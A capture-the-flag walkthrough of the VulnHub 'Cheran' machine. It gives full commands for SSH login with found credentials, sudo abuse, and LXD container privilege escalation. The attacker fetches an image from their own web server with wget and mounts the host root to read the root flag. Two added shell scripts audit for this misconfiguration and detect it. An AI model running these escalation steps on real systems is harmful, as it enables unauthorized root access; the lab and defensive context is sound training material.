[VULNHUB] Cheran

Today we are going to hack the Vulnhub machine called Cheran. You can download it from the following link: Cheran

Video


Enumeration


We start with an nmap scan to see which ports are open.

~ > nmap -A -p- 192.168.1.35                                                  
                                                                              
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-08 11:28 CEST
Nmap scan report for 192.168.1.35
Host is up (0.049s latency).
Not shown: 65531 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 38:20:1e:42:7a:d6:a9:2a:01:62:58:f3:b6:37:d8:41 (RSA)
|   256 e8:c1:5a:14:7a:c6:09:24:b6:0a:c0:05:e4:82:03:d9 (ECDSA)
|_  256 91:b9:e9:b9:e7:83:7a:28:71:48:c4:58:9b:39:7b:a1 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: A complete list of Chera Rulers and their contribution 
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: UBUNTU; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h50m02s, deviation: 3h10m31s, median: -2s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: ubuntu
|   NetBIOS computer name: UBUNTU\x00
|   Domain name: \x00
|   FQDN: ubuntu
|_  System time: 2020-09-08T14:59:23+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-08 11:29:23
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.96 seconds
http://192.168.1.35/robots.txt

/*
/users
/youtube
If we visit http://192.168.1.35/users.txt we see "Rajasimha", which, as the file name suggests, is probably the user. If we visit http://192.168.1.35/youtube/youtube.html we get a list of links to YouTube videos. Clicking on the 4th link from the bottom, we can see at the end of the video description: Password : k4rur. Now that we have a user/password pair, we try to log in over SSH.

Low Shell



~ > ssh Rajasimha@192.168.1.35                                      
Rajasimha@192.168.1.35's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Sep  8 15:06:41 IST 2020

  System load:  0.04              Processes:             97
  Usage of /:   25.4% of 9.78GB   Users logged in:       0
  Memory usage: 33%               IP address for enp0s3: 192.168.1.35
  Swap usage:   0%

Last login: Wed Jul 29 20:04:15 2020 from 192.168.1.9
Rajasimha@ubuntu:~$ 
We check whether we can do anything with sudo.

Rajasimha@ubuntu:/tmp$ sudo -l
[sudo] password for Rajasimha: 
Matching Defaults entries for Rajasimha on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User Rajasimha may run the following commands on ubuntu:
    (ALL, !root) /bin/bash
The rule lets us run /bin/bash as any user except root, so we use sudo to get a shell with the privileges of "cheran".

Rajasimha@ubuntu:/tmp$ sudo -u cheran /bin/bash
cheran@ubuntu:/tmp$ id
uid=1000(cheran) gid=1000(cheran) 
groups=1000(cheran),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),115(sambashare),116(lpadmin)

Privilege Escalation


As "cheran" we see that we belong to the lxd group, so we are going to use lxd to read the root flag: we mount the host filesystem inside a container and, from within the container, access the host's root directory. We start by initializing lxd.
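From the defender's side, the two things that made this chain work are both visible on the host before any container exists: an account in the lxd group, and a sudoers rule of the form "(ALL, !root) /bin/bash", which only excludes uid 0 and therefore still hands out a shell as every root-equivalent account. The following audit script is an added example, not part of the original writeup; SAMPLE_GROUP and SAMPLE_SUDOERS are constructed copies of /etc/group and /etc/sudoers modelled on this box, and the function names are my own.

```shell
#!/bin/sh
# Added audit example (not from the writeup): flag accounts in the lxd group and
# sudoers rules that grant a shell with a "(ALL, !root)" runas spec.
# The sample data below is constructed; on a real host pass "$(cat /etc/group)"
# and the output of "sudo cat /etc/sudoers" (or visudo -c -f <file>) instead.

SAMPLE_GROUP='root:x:0:
adm:x:4:syslog,cheran
sudo:x:27:cheran
lxd:x:108:cheran
sambashare:x:115:cheran
Rajasimha:x:1001:'

SAMPLE_SUDOERS='Defaults env_reset, mail_badpass
root ALL=(ALL:ALL) ALL
Rajasimha ALL=(ALL, !root) /bin/bash
%sudo ALL=(ALL:ALL) ALL'

# Comma-separated members of group $1 in the group-file text $2 (empty if none).
group_members() {
    printf '%s\n' "$2" | awk -F: -v g="$1" '$1 == g { print $4 }'
}

# Sudoers lines that grant a shell under a "(ALL, !root)" runas spec.
# Comments and Defaults lines are skipped.
shell_as_nonroot_rules() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*(#|Defaults)/ { next }
        /\(ALL[ \t]*,[ \t]*!root\)/ && /\/bin\/(ba)?sh/ { print }'
}

# Prints the number of findings on stdout; human-readable detail goes to stderr.
audit() {
    count=0
    members=$(group_members lxd "$1")
    if [ -n "$members" ]; then
        echo "FINDING: lxd group members are root-equivalent (a privileged container can mount /): $members" >&2
        count=$((count + 1))
    fi
    rules=$(shell_as_nonroot_rules "$2")
    if [ -n "$rules" ]; then
        echo 'FINDING: sudo rule grants a shell as any non-root account, lxd/sudo members included:' >&2
        echo "$rules" >&2
        echo '  fix: name the intended runas account explicitly, e.g. (cheran), and keep it out of lxd/sudo' >&2
        count=$((count + 1))
    fi
    echo "$count"
}

audit "$SAMPLE_GROUP" "$SAMPLE_SUDOERS"   # prints 2 for the sample data
```

The point of the sudoers check is that "!root" is a blacklist of one uid, not a privilege boundary: any account the rule still allows that sits in lxd, docker or sudo is as good as root. Replacing "(ALL, !root)" with the one account that is actually meant to be reachable closes the hole.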

cheran@ubuntu:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing block device? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=15GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, "auto" or "none") [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, "auto" or "none") [default=auto]: 
Would you like LXD to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 
cheran@ubuntu:~$ 
For the following steps the user "cheran" needs access to a file in Rajasimha's home directory in order to import the container image and use lxc, so as user Rajasimha we run the following command to make everything in that home directory accessible to everyone.

Rajasimha@ubuntu:/home$ chmod -R 777 Rajasimha/
We follow the steps described in [1] to use lxd. On our own machine we download the following script, which builds an image for us.

~ > git clone  https://github.com/saghul/lxd-alpine-builder.git
~ > cd lxd-alpine-builder
~ > ./build-alpine
Once we have the image, we move it to our web server to make it reachable.

~ > mv alpine-v3.12-x86_64-20200917_1130.tar.gz alp.tar.gz 
~ > sudo mv alp.tar.gz /var/www/html
We download it on the victim machine:

cheran@ubuntu:~$ cd /tmp 
cheran@ubuntu:/tmp$ wget http://192.168.1.59/alp.tar.gz
We run the following commands to import the image and set up the container.

cheran@ubuntu:/tmp$ lxc image import alp.tar.gz --alias alpine
cheran@ubuntu:/tmp$ lxc init alpine privesc -c security.privileged=true
Creating privesc
cheran@ubuntu:/tmp$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
cheran@ubuntu:/tmp$ lxc start privesc
Finally, we get into the container, where we are root and can browse the host's filesystem mounted at /mnt/root.

cheran@ubuntu:/tmp$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
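What this container looks like to an administrator is a privileged container with a disk device whose source is the host root. The following check is an added example, not from the writeup or from LXD's own tooling: it parses text in the shape of "lxc config show privesc --expanded" output. SAMPLE_CONFIG and SAMPLE_SAFE are constructed approximations of that YAML (the real output may carry more keys, but the config/devices sections and the source/type keys are the ones relied on here); the function names are my own.

```shell
#!/bin/sh
# Added detection example (not from the writeup): classify an LXD container
# config by whether it is privileged and mounts the host root (/) as a disk.
# On a real host: classify "$(lxc config show privesc --expanded)"
# The two samples below are constructed, not captured from the box.

SAMPLE_CONFIG='architecture: x86_64
config:
  image.description: alpine v3.12 (20200917_1130)
  security.privileged: "true"
devices:
  eth0:
    name: eth0
    nictype: bridged
    parent: lxdbr0
    type: nic
  host-root:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false'

SAMPLE_SAFE='architecture: x86_64
config:
  image.description: alpine v3.12
devices:
  data:
    path: /data
    source: /srv/share
    type: disk
ephemeral: false'

# Prints the name of every device under "devices:" whose type is disk and
# whose source is the host root, one per line. Indentation (2 spaces for a
# device name, 4 for its keys) is what delimits the YAML here.
host_root_disks() {
    printf '%s\n' "$1" | awk '
        function flush() { if (dev != "" && type == "disk" && src == "/") print dev }
        /^devices:/ { section = "devices"; next }
        /^[^ ]/     { flush(); dev = ""; section = ""; next }
        section == "devices" && /^  [^ ]/ { flush(); dev = $1; sub(/:$/, "", dev); src = ""; type = "" }
        section == "devices" && /^    source: / { src = $2 }
        section == "devices" && /^    type: /   { type = $2 }
        END { flush() }'
}

# Exit status 0 when security.privileged is "true" in the config section.
is_privileged() {
    printf '%s\n' "$1" | grep -q '^  security\.privileged: "true"'
}

# Verdict: "host-root-escape" (privileged and / mounted), "host-root-mount"
# (host root mounted but unprivileged, still worth review), or "ok".
classify() {
    disks=$(host_root_disks "$1")
    if [ -n "$disks" ]; then
        if is_privileged "$1"; then echo "host-root-escape"; else echo "host-root-mount"; fi
    else
        echo "ok"
    fi
}

classify "$SAMPLE_CONFIG"   # host-root-escape
classify "$SAMPLE_SAFE"     # ok
```

Running this over every container ("lxc list -c n --format csv" gives the names) turns the abuse into an alert instead of a surprise; the more durable fix remains not putting untrusted accounts in the lxd group, since membership alone is enough to create such a container.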

root.txt



~ # cd /mnt/root/root
/mnt/root/root # ls
root.txt
/mnt/root/root # cat root.txt 

  Bow & Arrow                                (/,**                              
  %%/  /***********/(.Cheran Flag.)/*******////*/*                              
  /(,,                   /*****/((((//******/   //                              
  /(,               .,,                         /(                              
  /(,                */,                        /                               
  (#,               ,    ,,,                   ./                               
  (#              ,        ,,,                 //                               
  (#            ..        ,,,                  /(                               
  ##           .(,,,,,,,,,,,,,,,               /,                               
  ##             *        ,,                   *.                               
  ##              ,        ,,                  *                                
  ##               *    .,,,                  /*                                
  ##                **,                     /*                                  
  #%               ,,                *****                                      
  #%  **,    .*****************,                                                
  #%*.                                                                          
  %%   Congrats...                                                              
           
  ##                                                                            
   
  ##                                                                           
  #(      Here is the Flag...                                                   
                
  #*                                                                            
 .#*                                                                            
   
 .(*         Share your screenshot in telegram : 
https://t.me/joinchat/N06BGRSyCLUnOBsONd9fxg                                    
                               
  *                                                                             

End


And with that we are root on the machine.

[1] https://www.hackingarticles.in/lxd-privilege-escalation/